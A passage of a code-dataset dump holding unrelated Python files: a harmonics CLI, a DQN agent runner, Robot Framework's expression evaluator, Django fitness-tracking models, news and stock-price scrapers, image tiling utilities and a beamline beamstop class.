--armonicos --save')\n print('\\nN = cantidad de armonicos (default: 15)')\n print('P = punto del tp (default: el set completo)\\n')\n print('Puntos:')\n print('\\t1: Set completo')\n print('\\t2: Primera semana de enero')\n print('\\t3: Segunda semana de enero')\n print('\\t4: Enero y febrero')\n print('\\t5: Marzo y abril')\n\n\ndef main(argv):\n point = 0\n n_armonicos = 15\n save_data = False\n try:\n opts, args = getopt.getopt(argv, \"hp:n:s\", ['punto=', 'armonicos=', 'save='])\n print(opts, args)\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n usage()\n sys.exit()\n elif opt in (\"-s\", \"--save\"):\n save_data = True\n elif opt in (\"-p\", \"--punto\"):\n try:\n value = int(arg)\n if ((value < 1) or (value > 5)):\n raise ValueError\n else:\n point = value - 1\n except ValueError:\n print('-p tiene que ser un numero entre 1 y 5')\n usage()\n sys.exit(2)\n elif opt in (\"-n\", \"--armonicos\"):\n try:\n n_armonicos = int(arg)\n except ValueError:\n print('-n tiene que ser un numero entero')\n usage()\n sys.exit(2)\n\n print('Save data', save_data)\n ranges = read_file()\n procesar_rango(ranges[point], n_armonicos, save_data)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525090322","text":"import argparse\nfrom collections import deque \nimport numpy as np\nimport sys\nimport os\nimport torch \n\n# import environment \nsys.path.append('../python/')\nfrom unityagents import UnityEnvironment\nenv = UnityEnvironment(file_name=\"Banana_Windows_x86_64/Banana.exe\")\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# import models and agents\nfrom models import QNetwork, DuelingQNetwork\nfrom agents import DQNAgent, DDQNAgent\n\n\ndef run(agent, name):\n \"\"\"\n Run simulation\n \n Params\n ======\n agent (object): Agent to train\n name (string): name of agent for loading model parameters\n \"\"\"\n # Load model parameters into agent\n checkpoint = torch.load('{}_checkpoint.pth'.format(name))\n agent.qnetwork_local.load_state_dict(checkpoint)\n \n # Begin simulation\n env_info = env.reset(train_mode=False)[brain_name] # reset the environment\n state = env_info.vector_observations[0] # get the current state\n score = 0 # initialize the score\n while True:\n action = np.int32(agent.act(state, 0)) # select an action (setting epsilon to zero)\n env_info = env.step(action)[brain_name] # send the action to the environment\n next_state = env_info.vector_observations[0] # get the next state\n reward = env_info.rewards[0] # get the reward\n done = env_info.local_done[0] # see if episode has finished\n score += reward # update the score\n state = next_state # roll over the state to next time step\n if done: # exit loop if episode finished\n break\n \n print(\"Score: {}\".format(score))\n\n \nif __name__ == \"__main__\":\n \n # Set up arguement parser\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ddqn\", \"--double_dqn\", help=\"Boolean - Whether to use double deep Q network\")\n parser.add_argument(\"-duel\", \"--duelling\", help=\"Boolean - Whether to use duelling architecture\")\n args = parser.parse_args()\n \n # Set default parameters\n if args.double_dqn == 'True':\n args.double_dqn = True\n else: \n args.double_dqn = False\n if args.duelling == 'True':\n args.duelling = True\n else: \n args.duelling = False\n\n print(\"Double DQN {}, Duelling Architecture {}\".format(args.double_dqn, args.duelling))\n \n # instantiate appropriate agent\n if (args.double_dqn is True) & (args.duelling is True):\n agent = DDQNAgent(state_size=37, action_size=4, model=DuelingQNetwork, seed=0)\n agent_name = 'duel_ddqn'\n \n elif (args.double_dqn is True) & (args.duelling is False):\n agent = DDQNAgent(state_size=37, action_size=4, model=QNetwork, seed=0)\n agent_name = 'ddqn'\n \n elif (args.double_dqn is False) & (args.duelling is True):\n agent = DQNAgent(state_size=37, action_size=4, model=DuelingQNetwork, seed=0)\n agent_name = 'duel_dqn'\n \n else:\n agent = DQNAgent(state_size=37, action_size=4, model=QNetwork, seed=0)\n agent_name = 'dqn'\n \n # Run simulation with specified agent\n print('Running simulation with {} agent'.format(agent_name))\n run(agent, agent_name)\n env.close()\n\n","sub_path":"Navigation/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"494015126","text":"# Copyright 2008-2015 Nokia Networks\n# Copyright 2016- Robot Framework Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom tokenize import generate_tokens, untokenize\nimport token\n\nfrom robot.errors import DataError\nfrom robot.utils import (get_error_message, is_string, MutableMapping, PY2,\n StringIO, type_name)\n\nfrom .notfound import variable_not_found\n\n\nif PY2:\n import __builtin__ as builtins\nelse:\n import builtins\nPYTHON_BUILTINS = set(builtins.__dict__)\n\n\ndef evaluate_expression(expression, variable_store, modules=None,\n namespace=None):\n try:\n if not is_string(expression):\n raise TypeError(\"Expression must be string, got %s.\"\n % type_name(expression))\n if not expression:\n raise ValueError(\"Expression cannot be empty.\")\n return _evaluate(expression, variable_store, modules, namespace)\n except:\n raise DataError(\"Evaluating expression '%s' failed: %s\"\n % (expression, get_error_message()))\n\n\ndef _evaluate(expression, variable_store, modules=None, namespace=None):\n if '$' in expression:\n expression = _decorate_variables(expression, variable_store)\n # Given namespace must be included in our custom local namespace to make\n # it possible to detect which names are not found and should be imported\n # automatically as modules. It must be also be used as the global namespace\n # with `eval()` because lambdas and possibly other special constructs don't\n # see the local namespace at all.\n namespace = dict(namespace) if namespace else {}\n if modules:\n namespace.update(_import_modules(modules))\n local_ns = EvaluationNamespace(variable_store, namespace)\n return eval(expression, namespace, local_ns)\n\n\ndef _decorate_variables(expression, variable_store):\n variable_started = False\n variable_found = False\n tokens = []\n for toknum, tokval, _, _, _ in generate_tokens(StringIO(expression).readline):\n if variable_started:\n if toknum == token.NAME:\n if tokval not in variable_store:\n variable_not_found('$%s' % tokval,\n variable_store.as_dict(decoration=False),\n deco_braces=False)\n tokval = 'RF_VAR_' + tokval\n variable_found = True\n else:\n tokens.append((token.ERRORTOKEN, '$'))\n variable_started = False\n if toknum == token.ERRORTOKEN and tokval == '$':\n variable_started = True\n else:\n tokens.append((toknum, tokval))\n return untokenize(tokens).strip() if variable_found else expression\n\n\ndef _import_modules(module_names):\n modules = {}\n for name in module_names.replace(' ', '').split(','):\n if not name:\n continue\n modules[name] = __import__(name)\n # If we just import module 'root.sub', module 'root' is not found.\n while '.' in name:\n name, _ = name.rsplit('.', 1)\n modules[name] = __import__(name)\n return modules\n\n\n# TODO: In Python 3 this could probably be just Mapping, not MutableMapping.\n# With Python 2 at least list comprehensions need to mutate the evaluation\n# namespace. Using just Mapping would allow removing __set/delitem__.\nclass EvaluationNamespace(MutableMapping):\n\n def __init__(self, variable_store, namespace):\n self.namespace = namespace\n self.variables = variable_store\n\n def __getitem__(self, key):\n if key.startswith('RF_VAR_'):\n return self.variables[key[7:]]\n if key in self.namespace:\n return self.namespace[key]\n return self._import_module(key)\n\n def _import_module(self, name):\n if name in PYTHON_BUILTINS:\n raise KeyError\n try:\n return __import__(name)\n except ImportError:\n raise NameError(\"name '%s' is not defined nor importable as module\"\n % name)\n\n def __setitem__(self, key, value):\n if key.startswith('RF_VAR_'):\n self.variables[key[7:]] = value\n else:\n self.namespace[key] = value\n\n def __delitem__(self, key):\n if key.startswith('RF_VAR_'):\n del self.variables[key[7:]]\n else:\n del self.namespace[key]\n\n def __iter__(self):\n for key in self.variables:\n yield key\n for key in self.namespace:\n yield key\n\n def __len__(self):\n return len(self.variables) + len(self.namespace)\n","sub_path":"src/robot/variables/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"645271494","text":"import datetime\n\nfrom cloudinary.models import CloudinaryField\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\nfrom django_cryptography.fields import encrypt\nfrom django_measurement.models import MeasurementField\nfrom pinax.referrals.models import Referral\nfrom safedelete.models import SafeDeleteModel\n\nfrom .base_models import DateTimeFields, Distance, Weight\nfrom pinax.referrals.models import Referral\nfrom cloudinary.models import CloudinaryField\nimport uuid\n\n\nclass CoachClient(DateTimeFields):\n \"\"\"docstring for Feedback.\"\"\"\n\n coach = models.ForeignKey(\n get_user_model(), on_delete=models.CASCADE, related_name=\"coach\")\n\n client = models.ForeignKey(\n get_user_model(), on_delete=models.CASCADE, related_name=\"client\")\n\n\nclass AnalyticsShareToken(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Feedback.\"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n uuid = models.UUIDField(default=uuid.uuid4)\n\n\ndef get_default_goal_date():\n return datetime.datetime.today() + datetime.timedelta(days=30)\n\n\ndef get_default_goal_mfp_autosync_startdate():\n return datetime.datetime.today() - datetime.timedelta(days=90)\n\n\nclass Wallet(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Feedback.\"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n coins = models.IntegerField(default=0)\n\n def __str__(self):\n return f\"Wallet from {self.user}: {self.coins}\"\n\n\nclass MFPCredentials(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Feedback.\"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n username = models.CharField(max_length=255)\n password = encrypt(models.CharField(max_length=255))\n mfp_autosync = models.BooleanField(default=False)\n mfp_autosync_startdate = models.DateTimeField(\n default=get_default_goal_mfp_autosync_startdate,\n blank=True,\n )\n last_mfp_log_date_synced = models.DateTimeField(null=True, blank=True)\n\n def __str__(self):\n return f\"MFPCredentials from {self.user}\"\n\n\nclass Feedback(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Feedback.\"\"\"\n\n user = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)\n comment = models.TextField()\n contact_email = models.EmailField()\n\n def __str__(self):\n return f\"Feedback from {self.user}: {self.comment[0:10]}\"\n\n\nclass Subscription(DateTimeFields, SafeDeleteModel):\n \"\"\"docstring for Subscription.\"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n\n choices = [\n (\"F\", \"Free\"),\n (\"B\", \"Bronze\"),\n (\"S\", \"Silver\"),\n (\"G\", \"Gold\"),\n (\"P\", \"Platinum\"),\n ]\n type = models.CharField(\n max_length=1, choices=choices, default=\"Free\", blank=True, null=True\n )\n expires = models.DateTimeField(null=True, blank=True)\n\n\nclass Streak(DateTimeFields, SafeDeleteModel):\n \"\"\"\n Represents the user streaks\n \"\"\"\n\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n\n input_streak = models.IntegerField(\n default=0\n ) # Amount of days the user has in succession inputed data\n defecit_streak = models.IntegerField(\n default=0\n ) # Amount of days in succession that the user has a caloric defecit\n surplus_streak = models.IntegerField(\n default=0\n ) # Amount of days in succession that the user has a caloric surplus\n\n def actualize_input_streak(self):\n \"\"\"\n Actualizes the input streak via counting the consecutive log entries\n \"\"\"\n\n logs = self.user.log_set.all().order_by(\"date\")\n streak = 0\n last_log = None\n\n for log in logs:\n if last_log is None:\n last_log = log\n continue\n\n if (log.date - last_log.date).days <= 1:\n streak += 1\n else:\n streak = 0\n\n last_log = log\n\n self.input_streak = streak\n self.save()\n\n\nclass Setting(DateTimeFields, SafeDeleteModel):\n \"\"\"\n - Age\n - Sex/gender\n - Height\n - Perceived activity level\n - Goal - maintain, lose, gain\n - Goal weight\n - Goal date - by when?\n \"\"\"\n\n user = models.OneToOneField(\n get_user_model(), unique=True, blank=False, null=False, on_delete=models.CASCADE\n )\n\n age = models.IntegerField(blank=True, null=True, default=30)\n\n sex_choices = [\n (\"M\", \"Male\"),\n (\"F\", \"Female\"),\n ]\n\n sex = models.CharField(\n max_length=1, choices=sex_choices, blank=True, null=True, default=\"M\"\n )\n height = MeasurementField(\n measurement=Distance, null=True, blank=True, default=Distance(m=1.75)\n ) # height in metres\n\n activity_choices = [\n (\"1\", \"Sedentary (little or no exercise)\"),\n (\"2\", \"Lightly active (light exercise/sports 1-3 days/week)\"),\n (\"3\", \"Moderatetely active (moderate exercise/sports 3-5 days/week)\"),\n (\"4\", \"Very active (hard exercise/sports 6-7 days a week)\"),\n (\"5\", \"Extra active (very hard exercise/sports & physical job or 2x training)\"),\n ]\n activity = models.CharField(\n max_length=1,\n choices=activity_choices,\n blank=True,\n null=True,\n help_text=\"Used to estimate your total daily energy expenditure until we have enough data to calculate it\",\n default=\"1\",\n )\n\n goal_choices = [\n (\"L\", \"Lose\"),\n (\"M\", \"Maintain\"),\n (\"G\", \"Gain\"),\n ]\n goal = models.CharField(\n max_length=1,\n choices=goal_choices,\n blank=True,\n null=True,\n help_text=\"Do you want to lose, maintain, or gain weight?\",\n default=\"M\",\n )\n\n goal_weight = MeasurementField(\n measurement=Weight, null=True, blank=True, default=Weight(kg=80)\n ) # default weight is in kg\n goal_date = models.DateTimeField(\n blank=True, null=True, default=get_default_goal_date\n )\n unit_choices = [\n (\"I\", \"Imperial (pounds, feet, inches etc.)\"),\n (\"M\", \"Metric (kgs, meters, centimeters etc.)\"),\n ]\n unit_preference = models.CharField(\n max_length=1,\n choices=unit_choices,\n blank=True,\n null=True,\n help_text=\"Display metric or imperial units on analytics page\",\n default=\"M\",\n )\n\n @property\n def time_to_goal(self):\n # Returns int days until goal_date\n return (self.goal_date - datetime.datetime.now(datetime.timezone.utc)).days\n\n def __str__(self):\n return f\"Settings from {self.user}\"\n\n\nclass Image(DateTimeFields, SafeDeleteModel):\n\n Image = CloudinaryField(\"image\")\n # todo we want to be able to make this relational optional foreign key to Log\n\n\nclass Log(DateTimeFields, SafeDeleteModel):\n \"\"\"\n - Date\n - Weight\n - Calories In\n - Calories Out\n - Activity LVL\n - progress pic\n \"\"\"\n\n class Meta:\n unique_together = (\"user\", \"date\")\n\n user = models.ForeignKey(\n get_user_model(),\n blank=False,\n null=False,\n on_delete=models.CASCADE,\n )\n\n date = models.DateField(blank=False) # Log the date\n\n weight = MeasurementField(measurement=Weight, null=True, blank=False)\n\n calories_in = models.IntegerField(\n blank=False,\n help_text=\"Total calories consumed\",\n ) # Calories consumed in kcal\n\n calories_out = models.IntegerField(\n blank=True,\n null=True,\n help_text=\"If you have a fitness tracker, total calories burned\",\n ) # From fitness tracker e.g. apple watch, fitbit etc.\n\n choices = [\n (\"L\", \"Low\"),\n (\"M\", \"Moderate\"),\n (\"H\", \"High\"),\n ]\n\n activity_lvl = models.CharField(\n max_length=1,\n choices=choices,\n blank=True,\n null=True,\n help_text=\"Estimate your relative activity level\",\n )\n\n front_progress_pic = CloudinaryField(\"image\", null=True, blank=True)\n side_progress_pic = CloudinaryField(\"image\", null=True, blank=True)\n back_progress_pic = CloudinaryField(\"image\", null=True, blank=True)\n\n def __str__(self):\n return f\"Log from {self.user}\"\n","sub_path":"mysite/nuk1i/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"651372241","text":"from bs4 import BeautifulSoup\nimport requests\nfrom save_date_by_text_file import save_link_list\nfrom custom_tools import logs\nimport re\nimport sys\nfrom save_date_by_text_file import load_link_list\n\nstart_url = 'http://news.sina.com.cn'\nnews_example_url = 'http://news.sina.com.cn/c/gat/2018-09-16/doc-ihkahyhx5736214.shtml'\nurl_list = []\nnews_url_list = []\nurl_set = set()\ntemp_set = set()\n\n\ndef get_soup(url):\n sessions = requests.session()\n sessions.headers[\n 'User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36'\n html = sessions.get(url)\n html.encoding = 'utf-8'\n html = html.text\n return BeautifulSoup(html, 'html.parser')\n\n\ndef get_article_by_id_sina(url):\n soup = get_soup(url)\n return soup.find(id=\"article\", class_=\"article\").text\n\n\ndef get_url(url=start_url):\n try:\n soup = get_soup(url)\n for link in soup.find_all('a'):\n try:\n new_link = link['href']\n if new_link != 'javascript:void(0)':\n # print(link['href'])\n temp_set.add(new_link)\n except KeyError:\n pass\n except requests.exceptions.InvalidSchema:\n logs(\"maybe sever connection error\", 2)\n except requests.exceptions.MissingSchema:\n logs('requests.exceptions.MissingSchema', 2)\n\n\ndef get_url2(url=start_url):\n try:\n soup = get_soup(url)\n for link in soup.find_all(name='a',\n attrs={\n \"href\": re.compile(\n r'.*sina\\.com\\.cn/.{1,4}/[0-9]{4}-[0-9]{2}-[0-9]{2}/.+\\.shtml')}):\n # print(link['href'])\n temp_set.add(link['href'])\n except requests.exceptions.InvalidSchema:\n logs(\"maybe sever connection error\", 2)\n except requests.exceptions.MissingSchema:\n logs('requests.exceptions.MissingSchema', 2)\n\n\ndef get_all_links(url=start_url, save_file_name=\"all_links.dat\"):\n get_url2(url)\n temp_source_set = temp_set.copy()\n for link in temp_source_set:\n get_url2(link)\n logs('link \\\"{}\\\" has been used'.format(link), 0)\n save_link_list(temp_set, save_file_name)\n\n\ndef get_sina_news(url='http://news.sina.com.cn/c/2018-09-17/doc-ihkhfqns0753547.shtml'):\n news_link_set = set()\n html = requests.get(url)\n html.encoding = 'utf-8'\n html = html.text\n soup = BeautifulSoup(html, 'html.parser')\n # string=r'.*sina\\.com\\.cn/./[0-9]{4}-[0-9]{2}-[0-9]{2}/.+\\.shtml'\n for link in soup.find_all(name='a',\n attrs={\"href\": re.compile(r'.*sina\\.com\\.cn/.4/[0-9]{4}-[0-9]{2}-[0-9]{2}/.+\\.shtml')}):\n # print(link['href'])\n news_link_set.add(link['href'])\n return news_link_set\n\n\ndef get_news_content(url='http://news.sina.com.cn/c/2018-09-17/doc-ihkhfqns0753547.shtml'):\n news_content = ['title', 'date', 'content']\n soup = get_soup(url)\n news_content[0] = soup.find(name='h1', class_='main-title').text\n news_content[1] = soup.find(name='span', class_='date').text\n news_content[2] = soup.find(id=\"article\", class_=\"article\").text\n return news_content\n\n\na_news_list = set()\ncount = 0\n\n\ndef get_all_url(url):\n global count\n count += 1\n print(count)\n try:\n soup = get_soup(url)\n\n for link in soup.find_all(name='a',\n attrs={\n \"href\": re.compile(\n r'.*sina\\.com\\.cn/.{1,4}/[0-9]{4}-[0-9]{2}-[0-9]{2}/.+\\.shtml')}):\n a_news_list.add(link['href'])\n\n except requests.exceptions.InvalidSchema:\n logs(\"maybe sever connection error\", 2)\n except requests.exceptions.MissingSchema:\n logs('requests.exceptions.MissingSchema', 2)\n for link in a_news_list:\n get_all_url(link)\n\n # save_link_list(a_news_list, \"all.txt\")\n\n\nif __name__ == '__main__':\n # get_all_links('http://news.sina.com.cn/c/gat/2018-09-16/doc-ihkahyhx5736214.shtml', 'selected_news_url.dat')\n # get_sina_news('http://news.sina.com.cn/c/2018-09-17/doc-ihkhfqns0753547.shtml')\n # print(get_news_content())\n get_all_url('http://news.sina.com.cn/c/gat/2018-09-16/doc-ihkahyhx5736214.shtml')\n","sub_path":"Python/NewsViewer/get_news.py","file_name":"get_news.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"632490159","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage.transform import resize,rescale\nfrom skimage.util import random_noise,pad\n#from skimage.external.tifffile import imread,imsave\nfrom skimage.io import imread,imsave\nfrom skimage.filters import gaussian, laplace, threshold_otsu, median\nfrom skimage.feature import shape_index\nfrom skimage.feature import hessian_matrix, hessian_matrix_eigvals\n\n\n\ndef normalize2max(im):\n im = im-np.min(im)\n return im/np.max(im)\n\ndef getPatch(im,sz):\n sr,sc = im.shape\n rr = np.random.randint(sr-sz)\n cc = np.random.randint(sc-sz)\n return im[rr:rr+sz,cc:cc+sz],rr,cc\n\nfrom skimage.util import view_as_windows,pad\ndef get_padding(im,size = 256,stride = 256):\n sr,sc = im.shape[0],im.shape[1] \n pad_r = stride-((sr-size)%stride)\n pad_c = stride-((sc-size)%stride)\n \n if (sr-size)%stride ==0:\n pad_r=0\n if (sc-size)%stride ==0:\n pad_c=0\n return int(pad_r),int(pad_c)\n\ndef extract_tiles(im,size=256,padding=16): \n \n stride = size - 2*padding \n if len(im.shape)<3:\n im = im[:,:,np.newaxis]\n sr,sc,ch = im.shape \n \n pad_r,pad_c = get_padding(im,size,stride)\n \n im = pad(im,((0,pad_r),(0,pad_c),(0,0)),'reflect')\n patches = view_as_windows(im,(size,size,ch),stride) \n patches = patches[:,:,0,:]\n \n sh = list(patches.shape)\n sh[1] = sh[0]*sh[1]\n sh = np.delete(sh,0)\n patches = np.reshape(patches,tuple(sh))\n \n R = np.arange(im.shape[0])\n rv = view_as_windows(R,size,stride) \n rv = rv[:,0]\n \n C = np.arange(im.shape[1])\n cv = view_as_windows(C,size,stride) \n cv = cv[:,0]\n cc,rr = np.meshgrid(cv,rv)\n positions = np.concatenate((rr.ravel()[:,np.newaxis],cc.ravel()[:,np.newaxis]),axis = 1)\n \n params = {}\n params['padding'] = padding\n params['pad_r'] = pad_r\n params['pad_c'] = pad_c\n params['im_size'] = im.shape[:2]\n params['positions'] = positions\n \n return patches,params\n\ndef stitch_tiles(patches,params):\n padding = params['padding']\n pad_r = params['pad_r']\n pad_c = params['pad_c']\n im_size = params['im_size']\n positions = params['positions']\n size = patches.shape[1]\n \n result = np.zeros((im_size[0],im_size[1],patches.shape[-1]))\n \n for i,pos in enumerate(positions):\n rr,cc = pos[0],pos[1] \n result[rr:rr+size,cc:cc+size,:] += pad(patches[i,padding:-padding,padding:-padding,:],((padding,padding),(padding,padding),(0,0)),'constant')\n if pad_r>0:\n result = result[:-pad_r,:]\n if pad_c>0:\n result = result[:,:-pad_c]\n return result\n\n\ndef jaccard_coef(y_true, y_pred):\n smooth = 0.001\n #y_pred = K.cast(K.greater(y_pred, .8), dtype='float32') # .5 is the threshold\n #y_true = K.cast(K.greater(y_true, .9), dtype='float32') # .5 is the threshold\n intersection = np.mean(y_true * y_pred)\n sum_ = np.mean(y_true + y_pred)\n\n jac = (intersection + smooth) / (sum_ - intersection + smooth)\n\n return jac\n\ndef get_rand_patch(im,sz):\n sr,sc = im.shape\n rr = np.random.randint(sr-sz)\n cc = np.random.randint(sc-sz)\n return im[rr:rr+sz,cc:cc+sz]\n\ndef find_best_parameter(im,mbnet,scale=1,invert = True):\n sr,sc = im.shape\n N = 5\n if scale != 1:\n im = rescale(im,scale)\n \n variances = np.arange(0.0,0.01,0.0005)\n imgs = []\n for v in variances: \n if v ==0:\n r1 = im*1.0\n else:\n r1 = random_noise(im,mode = 'gaussian',var = v,seed = 42)\n r1 = normalize2max(r1)\n if invert:\n r1 = 1.0-r1\n random_patches = np.array([mbnet.shapenet_preprocess(get_rand_patch(r1,256)) for ii in range(N)]) \n y1 = mbnet.model.predict(random_patches) \n imgs.append(y1)\n \n imgs = np.array(imgs)\n\n ym = np.mean(1.0*(imgs>0.98),axis = 0)\n J = np.array([jaccard_coef(i,ym) for i in imgs])\n idx = np.where(J == np.max(J))[0][0] \n return variances[idx],[variances,J]\n \ndef predict_small_images(im):\n sr,sc = im.shape\n sz = 256\n r = int(np.ceil(sz/sr))\n im = np.tile(im,(r,r))\n if im.shape[0]>sz:\n y = shnet.segment(im) \n return y[:sr,:sc,:]\n else:\n x = shnet.shapenet_preprocess(im)\n y = shnet.unet.model.predict(x[np.newaxis,:]) \n return y[0,:sr,:sc,:]\n \n\n# def unsharp_mask(im):\n# return im - 0.8*gaussian(laplace(im),2)\n\ndef unsharp_mask(im,c=0.6,sigma=1):\n return (c/(2*c-1))*im - (1-c)/(2*c - 1)*gaussian(im,sigma)\n\ndef noise_profile(im,var1 = 0.005): \n im = normalize2max(im)\n gr,gc = np.gradient(im)\n e = gaussian(np.sqrt(gr**2 + gc**2),0.5)\n #e = np.abs(laplace(gaussian(im,2)))\n e = normalize2max(e)\n return random_noise(im,mode = 'localvar',local_vars = 0.00001+var1*(1-e),seed = 42)\n ","sub_path":"MiSiCgui/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"515096251","text":"from selenium import webdriver\r\nfrom selenium.webdriver.firefox.options import Options\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport time\r\nfirefox_options = Options()\r\nlist_prices = []\r\n\r\n\r\n\r\nprint(\"1\")\r\ndef browser_data():\r\n firefox_options.add_argument('--headless')\r\n firefox_options.add_argument('--disable-gpu')\r\n firefox_options.add_argument('window-size=1920x1080')\r\n print(\"2\")\r\n browser = webdriver.Firefox(executable_path='C:/Users/Johan/Webdrivers/geckodriver')#, options=firefox_options)\r\n print(\"3\")\r\n start_URL = \"https://www.plus500.se/\"\r\n print(\"4\")\r\n browser.get(start_URL)\r\n print(\"5\")\r\n print(browser.title)\r\n search_click = browser.find_element_by_xpath('/html/body/header/section/div/div/div/div[2]/div/div[2]/button')\r\n search_click.click()\r\n search_bar = browser.find_element_by_xpath('//*[@id=\"searchInstruments\"]')\r\n time.sleep(1)\r\n search_bar.send_keys(\"AMD\")\r\n time.sleep(2)\r\n search_bar.send_keys(Keys.RETURN)\r\n time.sleep(1)\r\n number_of_times = 0\r\n\r\n while True:\r\n now = datetime.now()\r\n price = browser.find_element_by_xpath('/html/body/div[1]/div[1]/section/div/div[1]/div[1]/p[1]/span[1]')\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n time_and_price = (current_time, price.text)\r\n print(time_and_price)\r\n number_of_times += 1\r\n browser.refresh()\r\n list_prices.extend(time_and_price)\r\n if number_of_times == 3:\r\n break\r\n time.sleep(2)\r\n\r\n print(list_prices)\r\n\r\n\r\nbrowser_data()\r\n","sub_path":"aasd.py","file_name":"aasd.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"142231138","text":"# gcd finds the common greatest factor of numbers.\n# it says that gcd(m, n) assuming m > n \n# if n divides m return n \n# otherwise compute gcd(n, m-n) and return that values\n\n\ndef gcd(m, n):\n if m.\n\n\"\"\"\nEMBLBeamstop\n\"\"\"\n\nfrom HardwareRepository.BaseHardwareObjects import Device\n\n\n__author__ = \"Ivars Karpics\"\n__credits__ = [\"MXCuBE colaboration\"]\n\n__version__ = \"2.2.\"\n__maintainer__ = \"Ivars Karpics\"\n__email__ = \"ivars.karpics[at]embl-hamburg.de\"\n__status__ = \"Draft\"\n\n\nclass EMBLBeamstop(Device):\n \"\"\"\n Descrip. :\n \"\"\"\n\n def __init__(self, name):\n \"\"\"\n Descrip. :\n \"\"\"\n Device.__init__(self, name)\n\n self.beamstop_distance = None\n self.default_beamstop_size = None\n self.default_beamstop_distance = None\n self.default_beamstop_direction = None \n\n self.chan_beamstop_distance = None\n\n def init(self):\n \"\"\"\n Descrip. :\n \"\"\"\n self.default_beamstop_size = \\\n self.getProperty(\"defaultBeamstopSize\")\n self.default_beamstop_distance = \\\n self.getProperty(\"defaultBeamstopDistance\")\n self.default_beamstop_direction = \\\n self.getProperty(\"defaultBeamstopDirection\")\n \n self.chan_beamstop_distance = \\\n self.getChannelObject('BeamstopDistance')\n if self.chan_beamstop_distance is not None:\n self.chan_beamstop_distance.connectSignal(\"update\", \n self.beamstop_distance_changed)\n\n def isReady(self):\n \"\"\"\n Descrip. :\n \"\"\"\n return True\n\n def beamstop_distance_changed(self, value):\n self.beamstop_distance = value\n self.emit('beamstopDistanceChanged', (value))\n\n def set_positions(self, position):\n if self.chan_beamstop_distance is not None:\n self.chan_beamstop_distance.setValue(position)\n self.beamstop_distance_changed(position) \n\n def moveToPosition(self, name):\n pass\n \n def get_beamstop_size(self):\n \"\"\"\n Descrip. :\n \"\"\"\n return self.default_beamstop_size\n\n def get_beamstop_distance(self):\n \"\"\"\n Descrip. :\n \"\"\"\n beamstop_distance = None\n if self.chan_beamstop_distance is not None:\n beamstop_distance = self.chan_beamstop_distance.getValue()\n\n if beamstop_distance is None:\n return self.default_beamstop_distance\n else:\n return beamstop_distance\n\n def get_beamstop_direction(self):\n \"\"\"\n Descrip. :\n \"\"\"\n return self.default_beamstop_direction\n\n def update_values(self):\n self.beamstop_distance = self.chan_beamstop_distance.getValue()\n self.emit('beamstopDistanceChanged', (self.beamstop_distance))\n \n","sub_path":"EMBL/EMBLBeamstop.py","file_name":"EMBLBeamstop.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}